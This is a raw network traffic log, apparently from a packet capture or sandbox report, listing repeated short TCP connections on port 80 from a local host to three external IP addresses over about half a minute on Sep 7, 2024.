                                                                                                                                                                    Sep 7, 2024 15:36:00.566313982 CEST5061580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.571187973 CEST805061545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.571260929 CEST5061580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.571389914 CEST5061580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.576400995 CEST805061545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.576505899 CEST5061580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.677124977 CEST5061680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.681930065 CEST805061645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.681993961 CEST5061680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.682373047 CEST5061680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:00.687163115 CEST805061645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.687273979 CEST5061680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:01.990933895 CEST5061780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:01.996054888 CEST805061764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.996145964 CEST5061780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:02.008908987 CEST5061780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:02.013863087 CEST805061764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.013926029 CEST5061780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:02.380189896 CEST5061880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.385112047 CEST805061845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.385214090 CEST5061880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.385289907 CEST5061880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.390310049 CEST805061845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.390382051 CEST5061880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.741946936 CEST5061980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.746808052 CEST805061945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.746944904 CEST5061980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.747068882 CEST5061980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:02.752187014 CEST805061945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.752249002 CEST5061980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:03.489314079 CEST5062080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:03.494225025 CEST805062064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.494293928 CEST5062080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:03.494374037 CEST5062080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:03.499803066 CEST805062064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.499860048 CEST5062080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:03.598427057 CEST5062180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.603282928 CEST805062188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.603393078 CEST5062180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.603456974 CEST5062180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.608694077 CEST805062188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.608815908 CEST5062180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.707087994 CEST5062280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.711922884 CEST805062288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.712044001 CEST5062280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.712106943 CEST5062280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:03.717158079 CEST805062288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.717216969 CEST5062280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:04.092093945 CEST5062380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:04.096865892 CEST805062364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.096937895 CEST5062380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:04.097090006 CEST5062380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:04.101970911 CEST805062364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.102046967 CEST5062380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:05.016170025 CEST5062480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:05.020948887 CEST805062464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.021037102 CEST5062480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:05.024671078 CEST5062480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:05.029594898 CEST805062464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.029665947 CEST5062480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:06.162727118 CEST5062580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:06.167624950 CEST805062545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.170129061 CEST5062580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:06.180757999 CEST5062580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:06.185651064 CEST805062545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.186084032 CEST5062580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:06.657879114 CEST5062680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.662722111 CEST805062688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.662801981 CEST5062680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.665580988 CEST5062680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.670418024 CEST805062688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.670466900 CEST5062680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.972508907 CEST5062780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.977416039 CEST805062788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.977484941 CEST5062780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.977546930 CEST5062780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:06.982639074 CEST805062788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.982719898 CEST5062780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:07.287826061 CEST5062880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:07.292701960 CEST805062888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.292790890 CEST5062880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:07.305811882 CEST5062880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:07.310745001 CEST805062888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.310810089 CEST5062880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:08.910077095 CEST5062980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:08.915713072 CEST805062945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.915788889 CEST5062980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:08.930808067 CEST5062980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:08.936436892 CEST805062945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.936499119 CEST5062980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:09.467921972 CEST5063080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:09.472909927 CEST805063064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.472976923 CEST5063080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:09.473066092 CEST5063080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:09.478111029 CEST805063064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.478168011 CEST5063080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:09.709572077 CEST5063180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:09.714431047 CEST805063145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.714507103 CEST5063180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:09.720680952 CEST5063180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:09.725492954 CEST805063145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.725560904 CEST5063180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:10.407238007 CEST5063280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:10.413517952 CEST805063264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.413681030 CEST5063280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:10.415184975 CEST5063280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:10.420887947 CEST805063264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.420952082 CEST5063280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:12.113409996 CEST5063380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:12.118305922 CEST805063388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.118385077 CEST5063380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:12.118444920 CEST5063380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:12.124387026 CEST805063388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:12.124440908 CEST5063380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:15.051035881 CEST5063480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:15.055879116 CEST805063445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.055943966 CEST5063480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:15.056001902 CEST5063480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:15.061561108 CEST805063445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.061619997 CEST5063480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:15.156348944 CEST5063580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:15.161288977 CEST805063564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.161371946 CEST5063580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:15.161449909 CEST5063580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:15.166558981 CEST805063564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.166624069 CEST5063580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:15.567054987 CEST5063680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:15.572022915 CEST805063688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.572127104 CEST5063680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:15.572266102 CEST5063680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:15.577367067 CEST805063688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:15.577413082 CEST5063680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.411317110 CEST5063780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.416212082 CEST805063788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.416338921 CEST5063780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.430758953 CEST5063780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.435978889 CEST805063788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.436074972 CEST5063780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.843692064 CEST5063880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.850555897 CEST805063888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.850637913 CEST5063880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.850769043 CEST5063880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:17.856791019 CEST805063888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:17.856879950 CEST5063880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:19.969070911 CEST5063980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:19.974065065 CEST805063988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.974190950 CEST5063980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:19.974263906 CEST5063980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:19.979500055 CEST805063988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:19.979577065 CEST5063980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:20.052442074 CEST5064080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.058108091 CEST805064045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.058204889 CEST5064080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.089087009 CEST5064080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.102022886 CEST805064045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.102674961 CEST805064045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.102715015 CEST5064080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.706614017 CEST5064180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.712258101 CEST805064145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.712337971 CEST5064180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.727703094 CEST5064180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:20.734512091 CEST805064145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:20.734568119 CEST5064180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:22.023300886 CEST5064280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:22.261533022 CEST805064288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.261626005 CEST5064280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:22.261761904 CEST5064280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:22.269404888 CEST805064288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:22.269484997 CEST5064280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:23.078607082 CEST5064380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.083693027 CEST805064364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.083883047 CEST5064380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.084032059 CEST5064380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.089747906 CEST805064364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.089812040 CEST5064380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.434653997 CEST5064480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.439522028 CEST805064464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.439646959 CEST5064480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.446404934 CEST5064480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.451383114 CEST805064464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.451458931 CEST5064480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.534333944 CEST5064580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.539803028 CEST805064564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.539887905 CEST5064580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.540126085 CEST5064580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.545589924 CEST805064564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.545656919 CEST5064580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.624778986 CEST5064680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.629838943 CEST805064664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.629940033 CEST5064680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.630027056 CEST5064680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:23.636092901 CEST805064664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:23.636183023 CEST5064680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:24.329655886 CEST5064780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:24.334712029 CEST805064745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.334793091 CEST5064780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:24.336992025 CEST5064780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:24.341922998 CEST805064745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.341991901 CEST5064780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:24.413460016 CEST5064880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.418467999 CEST805064888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.418545008 CEST5064880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.418637991 CEST5064880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.424408913 CEST805064888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.424515963 CEST5064880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.848432064 CEST5064980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.853874922 CEST805064988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.853946924 CEST5064980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.854051113 CEST5064980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:24.859970093 CEST805064988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:24.860047102 CEST5064980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:25.171252012 CEST5065080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.176107883 CEST805065045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.176176071 CEST5065080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.180735111 CEST5065080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.185933113 CEST805065045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.186007023 CEST805065045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.186052084 CEST5065080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.261084080 CEST5065180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.269109011 CEST805065145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.269171953 CEST5065180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.269339085 CEST5065180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:25.277812958 CEST805065145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:25.282061100 CEST5065180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:26.161976099 CEST5065280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:26.167133093 CEST805065245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.167222977 CEST5065280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:26.195453882 CEST5065280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:26.200860977 CEST805065245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.200918913 CEST5065280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:26.285777092 CEST5065380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:26.290724039 CEST805065364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.290847063 CEST5065380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:26.290956974 CEST5065380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:26.297816038 CEST805065364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.298799038 CEST805065364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:26.298903942 CEST5065380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:27.832336903 CEST6151980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:27.837536097 CEST806151988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.837610960 CEST6151980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:27.837677956 CEST6151980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:27.843110085 CEST806151988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:27.843168974 CEST6151980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:28.616313934 CEST6152080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:28.621149063 CEST806152045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.621220112 CEST6152080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:28.634011030 CEST6152080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:28.638997078 CEST806152045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:28.639079094 CEST6152080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:29.644095898 CEST6152180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:29.648996115 CEST806152145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.649065971 CEST6152180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:29.649149895 CEST6152180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:29.654395103 CEST806152145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.654534101 CEST6152180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:29.878424883 CEST6152280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:29.883209944 CEST806152288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.883280039 CEST6152280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:29.883342981 CEST6152280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:29.888681889 CEST806152288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:29.888766050 CEST6152280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:30.496766090 CEST5803280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.501828909 CEST805803264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.501925945 CEST5803280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.509231091 CEST5803280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.514224052 CEST805803264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.514281988 CEST5803280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.906033993 CEST5803380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.911057949 CEST805803364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.911149025 CEST5803380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.911212921 CEST5803380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:30.916831970 CEST805803364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:30.916889906 CEST5803380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:31.109532118 CEST5803480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:31.114748001 CEST805803464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.114814997 CEST5803480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:31.114892960 CEST5803480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:31.120423079 CEST805803464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.120467901 CEST5803480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:31.441436052 CEST5803580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:31.446355104 CEST805803545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.446415901 CEST5803580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:31.446538925 CEST5803580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:31.451713085 CEST805803545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.451788902 CEST5803580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:36:31.537269115 CEST5803680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:31.542119026 CEST805803688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:31.542186975 CEST5803680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:31.542273998 CEST5803680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:36:31.547383070 CEST805803688.198.29.97192.168.2.12
